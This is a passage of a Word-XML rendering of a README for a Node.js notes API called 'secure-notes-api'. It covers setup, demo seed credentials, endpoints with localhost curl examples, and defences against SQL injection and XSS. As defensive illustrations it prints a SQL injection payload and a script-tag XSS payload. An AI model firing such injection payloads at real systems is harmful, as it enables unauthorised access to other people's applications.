      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Auth | JWT (HS256) + bcrypt password hashes |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Runtime requirement | **Node.js &gt;= 22.5** (for `node:sqlite`) |</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`node:sqlite` is part of the runtime, so the project has **no native build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>step** — `npm ci` works on any machine without a C++ toolchain. Every SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>statement in the project is a prepared statement.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Express 4 was chosen over 5 for ecosystem maturity; `helmet`, `express.json`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>with a body size limit, and an explicit error handler are all wired in.</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2. Quick start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npm ci                # install dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>npm run seed          # create demo users (alice, bob, admin) and one note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>npm start             # http://127.0.0.1:3000</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npm test              # 14 automated checks, in-memory database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>npm run audit         # SCA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>npx eslint src scripts  # SAST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Environment variables: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Variable | Default | Notes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`PORT` | `3000` | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| `JWT_SECRET` | dev fallback | **required** when `NODE_ENV=production`, the process refuses to start otherwise |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| `DB_PATH` | `data/app.db` | use `:memory:` in tests |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| `NODE_ENV` | unset | `production` tightens the JWT secret requirement |</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Demo accounts created by `npm run seed`:</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alice / Alice#2026pass     (role: user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>bob   / Bob#2026password   (role: user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>admin / Admin#2026pass     (role: admin)</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3. API reference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 | Method | Path | Auth | Purpose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1 | POST | `/auth/login` | — | authenticate, returns a JWT |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| 2 | GET | `/api/data` | Bearer | returns the caller's notes |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| 3 | POST | `/api/notes` | Bearer | creates a note (own-choice endpoint) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| — | GET | `/api/notes/:id` | Bearer | reads one note, scoped to its owner |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| — | GET | `/health` | — | liveness probe |</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Login</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curl -s -X POST http://127.0.0.1:3000/auth/login \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">     -H 'Content-Type: application/json' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">     -d '{"username":"alice","password":"Alice#2026pass"}'</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```json</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"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  "token_type": "Bearer",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  "expires_in": 3600,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  "user": { "id": 1, "username": "alice", "role": "user"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Protected data</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TOKEN=$(curl -s -X POST http://127.0.0.1:3000/auth/login \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        -H 'Content-Type: application/json' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        -d '{"username":"alice","password":"Alice#2026pass"}' | node -pe 'JSON.parse(require("fs").readFileSync(0)).token')</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curl -s http://127.0.0.1:3000/api/data -H "Authorization: Bearer $TOKEN"</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Without a token:</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curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:3000/api/data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># 401</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Create a note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curl -s -X POST http://127.0.0.1:3000/api/notes \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">     -H 'Content-Type: application/json' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">     -H "Authorization: Bearer $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">     -d '{"title":"Meeting notes","body":"Rotate the lab passwords."}'</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4. Security measures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4.1 SQL injection (OWASP A03)</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**Every** query is a prepared statement whose SQL text is a constant defined in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>`src/db.js`; only bound parameters vary with the request.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```js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>findUserByUsername(db, username) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  return db.prepare('SELECT id, username, password_hash, role FROM users WHERE username = ?')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">           .get(username);</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There is no string concatenation and no template literal anywhere in the data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>access layer, so a payload such as `admin' OR '1'='1` is compared as a literal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>string and simply fails to match a row.</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 test suite asserts that four different injection payloads all return **401**.</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4.2 Cross-site scripting (OWASP A03)</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Two layers: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1. **Input validation** (`src/security.js`) — usernames must match</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">   `^[A-Za-z0-9_.-]{3,32}$`; note title/body are length-limited and type-checked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">   before they reach the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>2. **Output encoding** — every user-controlled string passes through</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">   `encodeForOutput()`, which applies HTML entity encoding to all strings in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">   the response object: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```js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>note.body = '&lt;script&gt;alert("xss")&lt;/script&gt;'   // stored as-is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>// returned as:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>note.body = '&amp;lt;script&amp;gt;alert(&amp;quot;xss&amp;quot;)&amp;lt;/script&amp;gt;'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Escaping on output (rather than mangling data on input) keeps the stored data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>faithful and stops a payload from executing if a client later injects the value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>into the DOM. The test suite posts a `&lt;script&gt;` payload and asserts the raw tag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>never appears in any response.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4.3 Broken authentication (OWASP A07)</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**Password storage.** Passwords are hashed with **bcrypt**, cost factor 10, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>never stored or returned in plaintext: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```js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>const hash = bcrypt.hashSync(password, 10);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>const ok   = bcrypt.compareSync(password, hash);</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bcrypt is used instead of a plain SHA-256 because it is deliberately slow and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>salted per user, which makes offline guessing and rainbow tables impractical.</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**Token issuing.** On success the server signs a JWT with HS256:</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```js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>jwt.sign({ sub: String(user.id), username: user.username, role: user.role },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">         secret, { algorithm: 'HS256', expiresIn: '1h', issuer: 'secure-notes-api'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 token carries only the subject, username and role — no secrets — because a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
